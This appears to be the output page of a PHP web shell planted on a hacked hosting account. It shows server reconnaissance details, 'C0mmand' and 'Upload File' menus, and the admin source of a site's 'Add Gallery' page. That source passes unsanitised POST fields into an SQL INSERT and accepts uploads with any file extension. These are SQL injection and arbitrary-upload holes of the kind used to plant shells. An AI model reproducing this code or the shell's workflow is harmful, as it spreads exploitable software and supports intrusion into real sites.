|
Server IP : 2a02:4780:11:1373:0:3017:be17:10 / Your IP : 216.73.216.55 Web Server : LiteSpeed System : Linux in-mum-web1273.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u806862359 ( 806862359) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u806862359/domains/pbacbse.org/public_html/adminweb/downloads/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
$page_title = 'Add Gallery';
include 'header.php';
?>
<div class="content-wrapper">
<section class="content mt-4">
<div class="container-fluid">
<div class="row">
<div class="col-md-12">
<?php include('alert-msg.php'); ?>
<div class="card card-primary">
<div class="card-header">
<h3 class="card-title"><?php echo $page_title; ?></h3>
</div>
<form action="" method="POST" enctype="multipart/form-data">
<div class="card-body">
<div class="row">
<div class="col-md-4">
<div class="form-group">
<label>Category</label>
<input type="text" class="form-control" autocomplete="off" name="category" list="category" />
<datalist id="category">
<?php
$sql_cat=mysqli_query($con,"select DISTINCT category from gallery where category!='' order by id desc");
while($row_cat=mysqli_fetch_array($sql_cat))
{
?>
<option value="<?php echo $row_cat['category']; ?>">
<?php
}
?>
</datalist>
</div>
</div>
<div class="col-md-4">
<div class="form-group">
<label>Title</label>
<input type="text" class="form-control" name="title" />
</div>
</div>
<div class="col-md-4">
<div class="form-group">
<label>Section</label>
<select class="form-control" name="section" onchange="ViewControl(this);">
<option selected>Gallery</option>
<option>PDF</option>
<option>Video</option>
</select>
</div>
</div>
</div>
<div class="row">
<div class="col-md-8">
<div class="form-group">
<label for="exampleInputFile">Gallery File</label>
<div class="input-group for-image-upload">
<div class="custom-file">
<input type="file" class="custom-file-input fileUpload_allow_gen" name="gallery_photo" id="exampleInputFile" >
<label class="custom-file-label" for="exampleInputFile">Choose file</label>
</div>
</div>
<label class="is_category_img_area" style="margin-top:10px;">
<input type="checkbox" name="is_category_img" value="1" /> Use this image for category image
</label>
<div class="input-group for-video-upload" style="display: none;">
<input type="url" class="form-control" name="video_file" />
</div>
</div>
</div>
</div>
<button type="submit" class="btn btn-primary" name="btnSubmit">Submit</button>
</div>
</form>
</div>
</div>
</div>
</div>
</section>
</div>
<?php include 'footer.php'; ?>
<script type="text/javascript">
function ViewControl(e)
{
if(e.value=="Video")
{
$(".for-image-upload").hide();
$('.for-image-upload').find('input').removeAttr("");
$(".for-video-upload").show();
$('.for-video-upload').find('input').attr("","");
}
else
{
$(".for-image-upload").show();
$('.for-image-upload').find('input').attr("","");
$(".for-video-upload").hide();
$('.for-video-upload').find('input').removeAttr("");
}
if(e.value == "Gallery") {
$(".is_category_img_area").show();
}
else {
$(".is_category_img_area").hide();
}
}
</script>
<?php
if(isset($_POST['btnSubmit']))
{
$category = $_POST['category'];
$title = $_POST['title'];
$section = $_POST['section'];
$is_category_img = isset($_POST['is_category_img']) ? $_POST['is_category_img'] : 0;
if($section=="Video")
{
$location=$_POST['video_file'];
}
else
{
$fileinfo=PATHINFO($_FILES["gallery_photo"]["name"]);
$newFilename="gallery_". time()."." .$fileinfo['extension'];
$location="uploads/gallery/" . $newFilename;
}
$ins = mysqli_query($con,"INSERT INTO `gallery` (`id`, `category`, `title`, `photo`, `section`, `is_category_img`) VALUES (NULL, '$category', '$title', '$location', '$section','$is_category_img')");
if($ins)
{
if($section!="Video")
{
move_uploaded_file($_FILES["gallery_photo"]["tmp_name"],$location);
}
$_SESSION['success_msg'] = 'Gallery has been added...';
echo"<script>window.location='gallery.php';</script>";
}
else
{
$_SESSION['error_msg'] = 'Unable to add Gallery...';
echo"<script>window.location='gallery.php';</script>";
}
}
?>